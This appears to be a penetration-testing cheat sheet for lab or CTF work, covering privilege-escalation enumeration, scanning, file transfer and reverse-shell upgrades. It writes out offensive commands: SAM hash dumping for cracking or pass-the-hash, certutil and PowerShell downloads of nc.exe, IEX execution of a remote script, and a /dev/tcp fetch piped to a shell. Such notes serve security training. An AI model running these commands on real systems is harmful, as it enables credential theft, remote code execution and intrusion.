Windows Enumeration
1. Run systeminfo to find info about running operating system, service pack and installed hotfixes, then find:
exploits
$ searchsploit, https://www.exploit-db.com/:
precompiled exploits
- https://github.com/abatchy17/WindowsExploits
- https://github.com/SecWiki/windows-kernel-exploits
hotfixes exploits
https://github.com/rasta-mouse/Sherlock
2. net users, net user username
3. C:\Windows\System32\config\SAM and C:\Windows\System32\config\SYSTEM
$ samdump2 SYSTEM SAM to dump hashes from sam and system then cracked with john/hashcat or directly used with Pass The Hash(pth-curl,pth-net,pth-rpcclient,pth-smbclient,pth-smbget,pth-sqsh,pth-winexe,pth-wmic,pth-wmis)
https://blog.ropnop.com/practical-usage-of-ntlm-hashes/
4. check installed programs in C:\Program Files and other places
cheatsheet
https://guif.re/windowseop
Linux Enumeration
1. $ cat /etc/passwd for existing users, check home directories and files owned by those users.
2. $ sudo -l, if you can run a binary/script with sudo
3. $ find / -perm -4000 2>/dev/null check for SUID files
4. $ cat /etc/crontab or crontab -l any cron jobs running?
pspy tool https://github.com/DominicBreuker/pspy/releases to find any binary/scripts that are being run repeatedly.
5. LinEnum.sh https://github.com/rebootuser/LinEnum, -t argument for more thorough test.
6. GTFObins https://gtfobins.github.io search info here which will help to escalate privileges.
7. linpeas.sh
$ linpeas -a > /dev/shm/linpeas.txt
$ less -r /dev/shm/linpeas.txt
cheatsheet https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Port Scan
$ masscan -p1–65535,U:1–65535 10.10.10.10 — rate=1000 -e tun0
$ nmap -A 10.10.10.10
SYN scan $ nmap -sCSV 10.10.10.10 -oA synscan
TCP SYN/ACK scan $ nmap -sTV -p- -Pn 10.10.10.10 -oA fulltcp
UDP scans for SNMP, tftp etc. $ nmap -sU 10.10.10.10 -oA udpscan
$ nmap -sC -sV -O -o res 10.10.10.10
Web
dirb, dirsearch, gobuster, wfuzz
$ gobuster -u http://10.10.10.xxxx -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html
https://wfuzz.readthedocs.io/en/latest/
Burpsuite
File Transfer
$ nc -lvnp 1234 > out.fil
$ nc 10.10.10.10 1234 < in.file
$ php -S 127.0.0.1:80
$ python3 -m http.server
$ python -m SimpleHTTPServer 80
$ wget/curl
C:\certutil.exe -f -split -urlcache http://10.10.10.10/nc.exe C:\Windows\Temp\nc.exe
C:\powershell.exe (New-Object System.Net.WebClient).DownloadFile(“http://10.10.10.10/nc.exe”, “C:\Windows\Temp\nc.exe”)
C:\powershell.exe IEX(New-Object System.Net.WebClient).DownloadString(‘http://ip/script.ps1')
without wge
$ nc -q 5 -lvnp 80 < linpeas.sh
$ cat < /dev/tcp/10.10.10.10/80 | sht/curl
SMB method:
Svr: $ impacket-smbserver test /root/dir_to_share
Client: C:\copy \\svr_ip\test\filename.exe
Reverse-Shell
fully interactive TTY shell:
you get reverse shell but not tty shell, run: python -c ‘import pty; pty.spawn(“/bin/bash”)’ hit CTRL-z, type “stty raw -echo “ and enter, type “fg” and enter. (input cannot be seen after hitting stty command so simply type fg and enter).
for windows
$ apt install rlwrap -y
Usage: $ rlwrap nc -lnvp 4444